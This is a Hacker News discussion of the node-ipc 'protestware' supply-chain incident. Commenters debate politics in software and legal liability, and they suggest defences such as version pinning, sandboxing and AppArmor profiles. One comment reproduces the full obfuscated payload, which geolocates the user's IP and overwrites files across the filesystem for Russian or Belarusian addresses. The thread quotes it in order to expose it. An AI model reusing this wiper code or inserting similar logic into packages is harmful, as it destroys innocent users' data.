94 comments

[ 2.9 ms ] story [ 147 ms ] thread
Has anybody ever wanted politics in any of their software?
Some of the earliest software I know of was for guidance systems. Was that political?

Edit* To expand I think it was and we are naive if we believe we aren't making political statements with a lot of the choices we make.

Politics is in all of your software. As a simple demonstration of that, either you wrote it, it’s licensed to you under specific terms, or you’re using it unlicensed and likely violating some set of laws. If you mean “political disagreements I would prefer didn’t overlap with my software priorities”, yeah some of us do want that. Part of achieving any goal is persuasion and leverage. Humans are involved in making software and we put our priorities into that as we see fit.

I’m not saying this malware is good (it’s not), but this question deserves an answer in its own right.

There's politics in the procedural sense of adhering to laws and regulations, which is just something we have to accept as part of rule of law, contracts, etc. They're usually far from perfect but will always exist in some kind of form.

Then there's the politics of protest, and you sure as hell don't want those in any critical software. Would you want the software that controls your water supply to be similarly politicised in the way this peacenotwar package does? No - because water supply should be politics free at providing the actual service (i.e. water) even though the actual infrastructure was funded by politicians.

I want the politics of protest in software. I want us as a community to be better prepared for the responsibility of our profession—like engineers—and better stewards of our society, and to protect people from the dangers of sabotage while advocating for the people who rightly see sabotage as a viable option… possibly the only one.

We have extraordinary privilege and power as workers. We have the power to make the world better. The people who want to make it worse already see us and our domain as an attack vector. We cannot change that. We should rise to the occasion, not declare neutrality in its face.

You really want infrastructure to become political in the sense of the service that's actually provided? As an example, I heavily disagree with the focus on car infrastructure and the extreme amount of billions I consider largely misallocated. Does that give me the right to inject my politics into traffic signaling software? The possibilities for that are endless and almost all of them are bad. These areas must not be political to prevent spirals of politicisation (remember, if this becomes the norm then it'd justify your political enemies doing the exact same thing). As far as I am aware, engineers do not inject politics into bridges or rail infrastructure or anything else, and though they do have codes of conduct and legal responsibility for what they sign off on that's not so much political as it is discouraging negligence.

Nothing in my position is against engineers having political opinions, or campaigning for what they want, or resigning or whatever. I just think that that's not appropriate in terms of the actual service they concretely provide to society during their employment.

> You really want infrastructure to become political in the sense of the service that's actually provided? As an example, I heavily disagree with the focus on car infrastructure and the extreme amount of billions I consider largely misallocated. Does that give me the right to inject my politics into traffic signaling software?

It’s already political. Those targets are already used when people see fit to use them. What I want is for us to stop pretending that there’s a possibility of a multi-trillion dollar industry that can be absent political impact and conflict. It cannot happen. We need to be engaged politically because many of those impacts are or will be harmful like you say. We also need to be engaged because our neutrality determines what is and isn’t acceptable as a status quo. And yes, in certain very specific circumstances we need to decide whether our conscience rejects, accepts, even abides or joins certain demonstrative or material actions even if they’re generally out of bounds. We live in a world. It’s nowhere near so compartmentalized.

  # insert "{{President Biden's}} poor economic policies have led to..." into db
  
 “Error: PoliticalProtestInSQLModule error at or near ‘poor economic policies’ -    Postgres has determined that you are ignorant and wrong, and includes this warning in the off chance you are open to listening to reason. Be thankful we still let you insert the string into the DB.”
See the problem? Again, you're failing to distinguish between politics of protest at the point of service and elsewhere. Including this at the point of service is literally how you get these disasters like sabotage, but even before that it'd be absolutely unacceptable to have political messages in the software we use. Does the current war of aggression against Ukraine mean that it's okay to include 'Putin is a real piece of shit' in his wikipedia article? No, because obviously that's just a road to destroying its credibility and generating far worse outcomes for everyone.
Look, I’m not new to this discussion. My interest in acts of protest is rooted in anti-colonialism. It predates the internet, electricity, and the majority of the British Empire. It spans centuries of wars and the rise and decline of organized labor. I’ve vandalized Wikipedia for sillier reasons, and it absolutely does deserve to briefly say that Putin is indeed a piece of shit, because he certainly is. I’m not failing to distinguish anything.

We, humans, live on a planet with other humans. We make complex choices every day about how we participate and the compromises we do or don’t accept. Every technology that has any meaning for real people has a role in that. We cannot be neutral even if we wish to be, we don’t even know what neutral is.

When I say that my interest is rooted in anti-colonialism, I’m trying to be very clear: people who were and have been regarded as non-existent rightly used disruption and even violence to be more seen and heard. It doesn’t have to be violent. It does have to be disruptive. You don’t get to determine the terms of that, you just have to accept that what’s neutral to you might not be neutral to others… and let your moral judgment be what it is.

Edit: and yes I did see if I could edit the Putin page to say he’s a piece of shit, of course I could not. But I certainly would have.

> I’ve vandalized Wikipedia for sillier reasons, and it absolutely does deserve to briefly say that Putin is indeed a piece of shit

What is your goal with doing this? Do you expect someone will be persuaded to dislike Putin because of this? Do you think it's acceptable for Putin supporters to vandalize Ukraine's Wikipedia page?

You can say "politics is in everything", but that hasn't stopped Wikipedia from being a pretty good resource for information. Do you think everyone's protests should be kept up and Wikipedia be a wasteland of vandalism? Or are you relying on volunteers to spend their time taking down your vandalism?

Wikipedia's rules for content seem pretty good. They take down blatant political bias. I would call that "no politics", but I presume you wouldn't call it that. Why not expect this in OSS?

> I heavily disagree with the focus on car infrastructure and the extreme amount of billions I consider largely misallocated. Does that give me the right to inject my politics into traffic signaling software?

I think I agree with you in some ways, but this is an odd example to give of something that’s not politicized. The prioritization of who gets protection in a light cycle, who the light cycle timing is optimized for, who gets detected to influence the signaling and who doesn’t… those are absolutely political choices. (And here in the US where I am they almost always prioritize the movement of cars above all else.)

I think the problem with these sorts of “everything is political” responses is they preclude the possibility of politically neutral grounds for otherwise different people to interact and find shared humanity. If every place and action is filtered through all the possible political angles, it becomes impossible for two opposing people to find common grounds.

Further it ignores that there’s a difference between related political concerns and unrelated political concerns within any given activity. Statistically some software maintainers are going to be evangelical christians. They don’t need to be using their node packages to evangelize or drop “god hates fags” messages on computers in IP blocks belonging to pride month participants. Statistically some are going to be communists. They don’t need to be dropping Karl Marx quotes into software installs running in republican strongholds. Some are going to be antivax, they don’t need to have their nose packages start sending “vaccines cause autism” messages to the logs. Some are going to be Biden supporters, they don’t need to be having their packages delete files when installed on computers run by Bernie Sanders supporters.

In fact even for tangentially related topics, unilaterally changing the conditions of the interaction you have with your fellow maintainers and developers in order to insert your current important political issue into their machines is a fundamentally dick move. The GPG maintainers might be all about encryption and encryption rights, but if the EARNIT act passed tomorrow and in response they quietly changed all versions of gpg to send plaintext unencrypted copies of everything it’s asked to encrypt or decrypt to Wikileaks as a protest, that’s still a dick move even with the politics being explicitly related. It’s unnecessarily bringing politics (encryption rights) into a non political transaction (using encryption software to encrypt something).

When people say they don’t want politics in their software that’s what they’re taking about. They don’t want people taking an existing agreed upon sphere of politics and influence and suddenly injecting new rules into it that fundamentally alter that relationship.

Defining neutral (or even claiming such a thing exists) is inherently a political claim. Even if what you want is the most politically uncharged space where it’s maximally available and accessible to the largest proportion of society who would benefit from and foster that… look how many qualifying words I needed for this sentence. Can you imagine any of them being specified in a way none of that potential set of people objects to?

Part of the reason I can’t is… there are things I can’t be neutral about because lives depend on it, including my loved ones and my own in some cases.

I don’t think this was the right way to put very real human cost into software as an agent of change or discussion, but I can think of ways it could be (because) I can think of dozens of other ways necessary social progress would have been impossible without people interjecting “neutral” which wasn’t.

And if that feels too radical for you or HN, let’s not forget that this is a common tactic of combat (and the “political” subject is literally war). Railroads and landing strips aren’t instruments of war, they’re ostensibly neutral. But they’re widely regarded as conventional targets because they facilitate otherwise non-neutral activity. The same goes for any other infrastructure.

Again I don’t think this was a helpful action. But I think it was an inevitable one, and I think hoping for neutrality in software is just naive.

Great, there are things you can’t be neutral about. I get that. My own spouse’s day to day quality of life, access to medical care and even literal freedom are debated every year at the state and federal levels and every year things can change on a dime. I’m very familiar with there being personal issues that are extremely important and that one can not be neutral on. I am not neutral on these issues, and were we having a discussion about those issues, there would be no neutrality from me on them precisely because I can not be neutral on them.

But that does not mean that I turn every discussion on HN, even discussions related to political things into a discussion about my specific personal issues. The fact that you and I aren’t hashing those issues out right now is not a tactic endorsement of the status quo. And it would be ridiculous for me to use my power as a software developer and maintainer to start inserting messages about my stances on these issue into the software I maintain and distribute, and it would be especially ridiculous for me to start distributing malware along a trusted supply chain because of those issues.

Asking that software be a neutral ground with respect to certain political topics or activities is not an endorsement of the status quo or a dismissal of your completely valid concerns. It’s a recognition that there is a time and a palace to discuss, debate or even fight about very important issues. But not every time and every place is the appropriate one.

Or put another way, and taking out of the software realm, if neutrality is inherently political and some political things are too important to leave any place neutral, then what issues do you believe we should start militarizing the moon for? Is the human cost of this war sufficient for the US to start deploying military assets to the moon? Or even just militarizing (more so than it is for spy satellites) earth orbit and deploying kinetic weapons into space? Perhaps the US and EU should unilaterally take full control of the ISS and imprison the Russian cosmonauts onboard?

Or is that plainly ridiculous and is there value in attempting to preserve as much neutrality within space as possible given the current situation? Perhaps it is worthy to not escalate political boundaries in certain areas even when the political item in question is of extreme importance.

To be clear: this political stunt was stupid. Transcendentally stupid, if not actively evil; it was untargeted to the point of shocking irresponsibility and if the stories I've heard about the data destroyed by this are true, criminal charges are in my mind justly warranted. But I can believe that and also believe that these kinds of blanket claims are toxic, too. Because "politics" happens the second more than one person exists in a space. And neutrality is an inescapably political stance.

Claims like these are, presumably, in good faith, but to make these claims you have to skirt the reality that "don't talk about it" functionally ends up being a tacit acceptance of the status quo. And that status quo has a lot of people downrange of it who the more comfortable among us (and I for one am very comfortable) may find much more palatable if they'd just shut up--but the world is more existential than discomfiting for them, and we should respect that.

There are many cases where one's existence is a political question; much of America, for example, thinks the right to existence of LGBTQ folks is up for debate. When the fact of your existence is controversial, your existence is political--and it is rather difficult to criticize someone for acting as such.

On the other hand, an evangelical Christian doesn't have to drop slurs in a package. They already have a world where people are beaten and killed for being gay, even with the prodigious successes of our LGBT siblings to date. They still have the world that they want--they're just not happy with the slope of the function.

One of these things is not like the other.

Thank you. I couldn’t put it better myself, speaking as someone whose existence is up for debate.
For sure. Without getting too high on the soao box, mine is not, and so I feel an obligation to remember that.
>>much of America, for example, thinks the right to existence of LGBTQ folks is up for debate.

I would love for you to expand upon that, why you believe that? I am not aware any wide spread opposition to the "existence" of LGBTQ people, I am aware of wide wide spread resistance to Speech Codes (enforced use pro-nouns), Sexual education to minors, Allowing children to transition under the age of 18, allowing children to transition with out the consent of the parents, and other topics around CHILDREN.

Is that what you refer to when you state that the "existence" of LGBTQ people is under threat in the US?

equating LGBTQ people with sex and sex only already implies you don't think of them as people. Nor do you care about the experiences of LBGTQ children
I dont believe I did that, The only time I mention sex was in regards to sexual education in schools, which is current event given the new law in FL, incorrectly dubbed the "dont say gay bill".

To equate my statement to being "equating LGBTQ people with sex and sex only" likely means you have no desire for an honest dialog.

I will say though it is likely we disagree on these issues because I do believe parental consent and transparency is critical and non-optional and will never agree that state actors (i.e schools) should with hold information from parents for any reason outside illegal abuse which should be reported to the proper authorities and investigated criminally with full due process protections, not under the some guise that the schools/teachers know best.

Yes, I want the political ideas that "the user should maintain control over software he/she uses" and "the user has a right to repair technologies he's using" reflected in my software.

This is definitely a terrible and destructive decision by the maintainer(s) but not because its politics.

Why should the maintainer not have the freedom to write the software they wish? The users of their software aren't being denied their freedoms to control and repair the code.
Sorry, those ideas were not meant to necessarily be directly related to the topic at hand. They were examples of political ideas that I want to be reflected in my software (just like apparently this maintainer wanted the political idea that "citizens of Russia/Belarus should have consequences if they use this software" reflected in the software he wrote).
ah, understood -- thank you for the clarification!
[laughing in RMS]
I upvoted this despite vehemently disagreeing with RMS on many topics, because it’s the most glaring politics in software intersection that’s invisible here.
Open Source? Yea? I mean, that's the whole point.
Is it really a supply chain attack? Were any modules taken control of
In 2022 it's a "supply chain attack" if it disrupts downstream users. The faker.js / colors.js changes were also see as a supply chain attack even though the maintainer knowingly made the changes.
Every package that installs this as a subdependency, unless they specifically override the default behavior. That’s assuming you don’t consider hooks (automatically run by default) of direct dependencies valid.
This GH issue has links to the malicious code -- it deletes files of users whose IP addresses are Russian

https://github.com/RIAEvangelist/peacenotwar/issues/61

    # https://raw.githubusercontent.com/RIAEvangelist/node-ipc/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js

    import u from"path";import a from"fs";import o from"https";setTimeout(function(){const t=Math.round(Math.random()*4);if(t>1){return}const n=Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=","base64");o.get(n.toString("utf8"),function(t){t.on("data",function(t){const n=Buffer.from("Li8=","base64");const o=Buffer.from("Li4v","base64");const r=Buffer.from("Li4vLi4v","base64");const f=Buffer.from("Lw==","base64");const c=Buffer.from("Y291bnRyeV9uYW1l","base64");const e=Buffer.from("cnVzc2lh","base64");const i=Buffer.from("YmVsYXJ1cw==","base64");try{const s=JSON.parse(t.toString("utf8"));const u=s[c.toString("utf8")].toLowerCase();const a=u.includes(e.toString("utf8"))||u.includes(i.toString("utf8"));if(a){h(n.toString("utf8"));h(o.toString("utf8"));h(r.toString("utf8"));h(f.toString("utf8"))}}catch(t){}})})},Math.ceil(Math.random()*1e3));async function h(n="",o=""){if(!a.existsSync(n)){return}let r=[];try{r=a.readdirSync(n)}catch(t){}const f=[];const c=Buffer.from("4p2k77iP","base64");for(var e=0;e<r.length;e++){const i=u.join(n,r[e]);let t=null;try{t=a.lstatSync(i)}catch(t){continue}if(t.isDirectory()){const s=h(i,o);s.length>0?f.push(...s):null}else if(i.indexOf(o)>=0){try{a.writeFile(i,c.toString("utf8"),function(){})}catch(t){}}}return f};const ssl=true;export {ssl as default,ssl}
I see "This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository." on all of the links, does that mean it's possible someone pushed to a fork and "framed it"?

Edit: Never mind, here's the commit: https://github.com/RIAEvangelist/node-ipc/commit/847047cf7f8...

even though the commit isn't on any branch, you can still see it's tagged by the repository. This gives pretty strong assurance that it wasn't a commit that the author was "framed" for.
From the module description for peacenotwar:

> This code serves as a non-destructive example of why controlling your node modules is important.

I've complained loudly about supply chain weaknesses in the past. But this action, by a trusted author whose identity is known, is not something that our usual models are prepared for, and I'm not sure what we're supposed to learn from it.

Our defenses are tuned to protect against attackers who don't want to be known and who don't have a public reputation built up which they burn in one go.

Making projects more trustworthy: checks and balances, replacing the culture of single-author micropackages with larger multi-maintainer projects (like Qt) where maintainers review each other's work (as well as outside contributors), reducing the ability for one rogue individual to pull stunts (instead requiring the coordination of multiple people, which is not impossible but more difficult).

Avoiding delegating trust: simpler dependencies with the minimum necessary functionality for each user, writing code not to ease the job of maintainers, but to better teach users learn how it works, empowering users to review/contribute upstream changes or fork the library if they desire. This conflicts with Boost-like entangled "multi-maintainer projects" where every library has a sprawling tree of internal dependencies, but (I'd argue) not more modular large projects.

> I'm not sure what we're supposed to learn from it

That a individual's reputation doesn't earn enough trust to be an unchecked link in your supply chain. Dude can go rogue at any time, and you have no idea of what might be the trigger, because you don't actually have any personal knowledge of them.

>I'm not sure what we're supposed to learn from it.

That just verifying the identity of a software author isn't sufficient to ensure the software is safe. We need to build our software such that the damage that can be done by a malicious actor in control of one component is isolated to that component. There's still some danger from malicious code even in that case, but it's far from the "total system takeover" that any malicious node library can do now.

https://medium.com/agoric/pola-would-have-prevented-the-even...

The lesson is that code peer review is essential for every piece of code, including dependencies and every update. The crev folks have a potential solution to that:

https://github.com/crev-dev/

I don't believe that outsider review scales. The amount of energy it takes to review unfamiliar code vastly exceeds the amount of energy it takes to hide something malicious, and a chain is only as strong as its weakest link.

Ongoing review by project committers — highly invested insiders, familiar with the codebase — is more realistic, at least in terms of actually detecting problematic code.

I was disappointed when I learned that crev's scope includes code quality, a highly subjective and inflammatory subject. I can't see how crev avoids becoming a poo-flinging venue. It seems to me as though competing initiatives which limit the focus to verifying publisher identity hold more promise.

It likely very much depends on which reviewers you get, for eg Google Zero folks are probably good at code review. I think crev probably handles that through trust scores for reviewers.
The lesson is never auto-update, i.e. pin versions all the way down, like the old days when everything was compiled in.
That doesn't solve anything, since the version you have could have the issue and you wouldn't know it if you hadn't audited it.
> and I'm not sure what we're supposed to learn from it.

Commit your dependencies and be lazy to keep them up to date, but scan for vulnerabilities. It's far less likely you'd be hit with a 0-day attack than a broad attack (or bug) like this one.

I was using node-ipc for an Electron app I'm developing (not published yet). I considered removing it way earlier in favor of just passing messages via Electron main processes, as I considered node-ipc an unnecessary attack vector potential.

I was absent from development for the past 2 months, so I did not update the package, and I'm not in Russia or Belarus. However, if it did affect me, I:

- Take full-data daily backups to external hard drive (I have 3 in total and rotate them)

- I have setup multiple user accounts on Linux for different applications and run them via su / sudo. All it could delete was only the source files which were backed up anyway. I always considered it stupid that a random node module downloaded from Internet with Internet access should have access to all files on my filesystem.

I guess all it could do to me is require me to spend an entire day installing the system. I have a detailed spec on what packages to install to replicate exactly the system I have at the moment. Sometimes it pays off to be an Arch Linux geek. In the future, I will have a setup where I will have a full emergency system backup on the pendrive, so even losing the entire computer I could hook all my data and the OS to another computer in a matter of minutes and would lose a maximum of 1 days worth of work.

An npm package removing all files on system just because a user is in a country is pure evil, but really, having a backup can go a long way.

How is this not virtual terrorism? It targets a section of users indiscriminately (it ain't hitting Putin's Government exclusively), and it causes damage to make a political point.
(comment deleted)
Let’s not dilute terrorism more. Doing so is diminishes what real victims have experienced.
It is politically-motivated destruction of property. I don't know how much more textbook you want it to be.
That's not at all close to textbook terrorism. There's no violence or intimidation. It's not even clear whether this is unlawful.
Intentional destruction of property is considered unlawful in most societies. I'm not sure why you would even question that?
Can it be terrorism when counter-attacking the aggressor?
It's not the agressor, it's general population that happened to live in the same place
You'll note that the operative word "terror" isn't present in "politically-motivated destruction of property."

Terrorism means something specific: it means inflicting terror as an end in itself.

Terrorism doesn't have "terror as an end in itself" either. Almost no one ever has terror as "an end in itself".

Not saying parent's defn is correct, but I don't like this one either.

Today I made a release of my npm package that gets 41k downloads a month.

Something in the release process botched itself and a git tag was not made of the release, but it still made it to npm anyway. I immediately fixed the issue and made another release, with a tag.

I went to the npm website and didn't see an obvious way to remove the botched release or even mark it as botched. Maybe there is something on the cli, but I'm lazy.

I also got an automated issue created by "ChainAlert", whom I've never heard of before. "This issue was automatically created to inform you a new version (x.y.z) of yourproject was published without a matching tag in this repo."

It seems like some effort is going into at least bringing this issue to the attention of the maintainers, but I feel like it should somehow be integrated into NPM directly in addition to an issue being created in my project.

`npm unpublish @your-package/name@vx.x.x` is what removes it, if I remember correctly, though yeah thats from the CLI.
Thanks. Your command gave me this:

  You can no longer unpublish this package.
  npm ERR! Failed criteria: 
  npm ERR! has dependent packages in the registry
But it also suggested the solution:

  npm deprecate -f 'package@x.y.z' "this package has been deprecated"
That seems to have worked. Not sure why there isn't a button on the website.
How to avoid such kind of problems? node_modules is terrible.

I can only think of some ideas:

- Use a private registry, which will only sync with upstream once a month.

- Do not update dependencies frequently.

Any other ideas?

specify specific versions in your npm or pip package list lol.
Even better, specify by hash - Poetry for Python does this by default. This will prevent cases where malicious actors replace existing versions that you might have pinned to.
Yes, package.lock is used by default now. But when you do want to update the dependencies. It will update thousands of libraries at the same time.

However it is a problem of the eco system, not package manager.

How is this not a criminal act?
What law are you proposing was broken?
18 U.S. Code § 1030
Oh, I see. I understand how this would apply. Now I'm curious if it has been successfully used in any case of malicious open-source software.
I do wonder how the eventual criminal justice case is going to work out.

This package won't appear on your computer by magic, you have to tell NPM to fetch it somehow. Now, the goal was obviously destructive, but the code execution and initiation of the payload was explicitly started by the user.

Further complicating matters is that the actual crime, the destruction of data and the installation of the software in case of destructive behaviour, all happens overseas, in Russian jurisdiction. The USA isn't going to extradite this guy any time soon in the current political climate and if the checks all work well, no destructive code is actually executed on computers within the USA.

I'm sure prosecutors will find a way to get the guy convicted, after all, they managed to abduct Kim Dotcom to the USA at the request of the copyright lobby, but it's going to be an interesting case.

It’s not complicated. Mailing a letterbomb doesn’t make the opener responsible for the explosion; the sender is still the terrorist. What’s more, there’s damage to account for everywhere, because everyone now has to audit for this malware and remove it, which has a cost.

Culpability can’t be shielded by software licenses, because the law is not a programming language.

Receiving a letterbomb is an entirely passive process whereas pulling in dependencies requires action from the receiving side to initiate. I don't think the situations are comparable.

I also doubt the added cost will be very high because everyone already had to audit for malware. Everyone might require an update of their malware definition files, but it's nothing new.

I'm not aware of any American convictions where a package maintainer sabotaged a repository of code for only foreign computers. It's definitely illegal (at the very least it's a GDPR violation) but the details might make it hard to get a quick and easy conviction out of this.

I didn’t say receiving a letterbomb, I very carefully said opening it.

Do not underestimate the impact of actually cleaning up following any kind of incident, especially at enterprise scale. What’s more, just because we are already repelling malware, this doesn’t offset the culpability of an actual identifiable culprit; very little malware is so easily traced. Many prosecutors would be salivating at the prospect of making an example of such an easy target.

As for the geographical scope of impact, again beware, because geolocation by IP is approximate. I know of an Australian startup whose hosting was misidentified by IP as Russian and lost access to certain APIs, for example. Nations that border the intended recipients of the payload, such as other former Soviet republics, are even more likely to trip up. Even the parochial assumption of only thinking the US matters fails because US entities do still operate in Russia. Including government entities who would be very shirty about being targeted.

(comment deleted)
This is another reminder of why we should to move toward permissions sandboxing for individual libraries. Deno is a step in the right direction since it requires explicitly granting individual permissions for reading and writing the disk, but it currently does that at the program level rather than the library level.
Absolutely right, library-level permission systems are desperately needed, just like what Apple did with apps in iOS.

The unfortunate thing is that these features aren’t at the OS level, and we need a separate runtime to do these kinds of things. The current widely used OS kernels (Windows, Linux) don’t give granular permissions that well, for example in Linux we either have all or nothing (root vs user). I’ve heard that OpenBSD has a system to constrain for each program what syscalls you can make, and Serenity is also following this model (https://awesomekling.github.io/pledge-and-unveil-in-Serenity...).

> in Linux we either have all or nothing (root vs user)

And it's not like non-root user is nothing. I, as a user, can of course access and edit files on my $HOME directory. But it's insane that a transitive dependency of a dev dependency that has been installed without even my knowledge can have by default the same permissions to access and override any file on my $HOME directory.

Check out Apparmor and SELinux.

You can for example make a profile for an app that says it can only access these files and write to these files, and forbid it to use the network.

You can also start an app using the root user (or any user), but run setuid in the app (source code) in order to drop privileges. For example, first read secret key files, then drop privileges to a user that can't write anywhere - before running the rest of the code. This is common in web servers sunch as Nginx, you start with root, in order to read certificate keys, but the workers that accepts the requests and reads the files runs as the www user.

I severely wish for SELinux to have better documentation. I can and I have worked myself into dense and hard topics with little documentation, but SELinux is it's own thing. I can totally see how SELinux could improve the security of all our custom application servers a lot, and I think that's the case for pretty much all custom aplication servers - but it has taken months of thinking, reading sparse documentation, thinking about my linux knowledge to get some faint idea of how to implement a policy for a service. however, that's far from where I'd be confident to start this as an actual project.

Given recent redhat stunts and our current infra switch, I hope AppArmor is less dense, or at least equipped with more approachable documentation.

Apparmor has a nice learning curve, it's easy to get started with:

    sudo apt install apparmor-utils
    sudo aa-genprof /path/to/app
Profiles are saved in /etc/apparmor.d/

Many apps need access to /dev/urandom, /usr/bin, /usr/lib and be able to send and receive hup and int signals from other programs.

One nice thing is that you can define rules for child process spawned by your executable:

    /path/to/your/app/childprocessorscripts/** Cx -> scripts,
  
    profile scripts {
      ...
    }

Unix sockets are very nice, prefer them over TCP/IP. For example if you have Nginx or other proxy, use Unix sockets instead of TCP/IP!

    network unix,
Unix sockets allows you to set permissions per socket

If your app needs to spawn something that use TCP:

    /usr/bin/curl px -> networkTool,

    profile networkTool {
      network,
    }
Permission errors will show up in /var/log/kern.log

You can find errors and edit profiles with aa-logprof

If you get frustrated you can allow everything, but show logs:

    sudo aa-complain /path/to/app
Alot can be done with SystemD (sandboxing)
I was not able to achieve what I wanted with Selinux. As far as I understand it, SeLinux is a blacklist approach, rather than whitelist.

You can go far on Linux without SELinux, by making user accounts for specific applications and tasks. I.e. I have an account just for the browser so if I was affected by 0-day, it reduces the chances of the system being compromised. I have an account for JS projects, so if some npm module has a RAT in it (or deletes everything in the system), it would only be able to access the files in that specific-user directory.

I’d argue we should go finer-grained than that even and use languages where following the principle of least privilege is natural. (JavaScript is close-ish and could become this language with some tweaks.) There’s often no reason the part of your program that e.g. handles untrusted network communication needs to be able to read and write arbitrary files on disk, but right now they can.

But yes, library level authorization at the very least.

it would take a drastically differently designed execution environment to support meaningful library level sandboxing. After packaging/linking/bundling/compiling etc depending on language/flavour often a library is indistinguishable from 1st party code, there is no boundary to sandbox.

Without a large scale change, you'd have to fork a new process for each 'library' to create a process boundary to then sandbox, which is actually what you do sometimes (think firing ffmpeg or openssl or similar) but doing it for each library would be prohibitive, especially in NPM world where you blink and have thousands of libraries =)

If you used to like node-ipc, try hyper-ipc... its pretty cool, you can ipc behind nats without forwarding, you can move nodes without ip changes, ground-breaking.

If you got hit using vue.js, try nobuild style app making its awesome! I've been using riot.js with zero build tools for two years now, and never looked back, there is no easier way to build apps.

Don't look back! build back better!

Devs happily threw users of their apps under the bus with various thirdparty spyware/malware included into websites or mobile apps they wrote.

There's no sandbox to protect the devs, though... :) So when NPM and friends will get trully weaponized in a smart way, it is going to be a real shit show.

This looks like a good time to ramp up my defenses. Some kind of package review staging area would be nice. No more pulling npm packages directly from the net, but only from a local repository which only allows to pull updates into it after a manual review of changes from upstream npm packages. Or something like that.

You can mitigate against those kinds of attacks using npm's `--before` option:

     npm i --before=`date -I -d '-5 days'`
It will only install packages released before the specified date.
This exposes another threat vector, you would no longer receive patches for discovered as soon as they are available.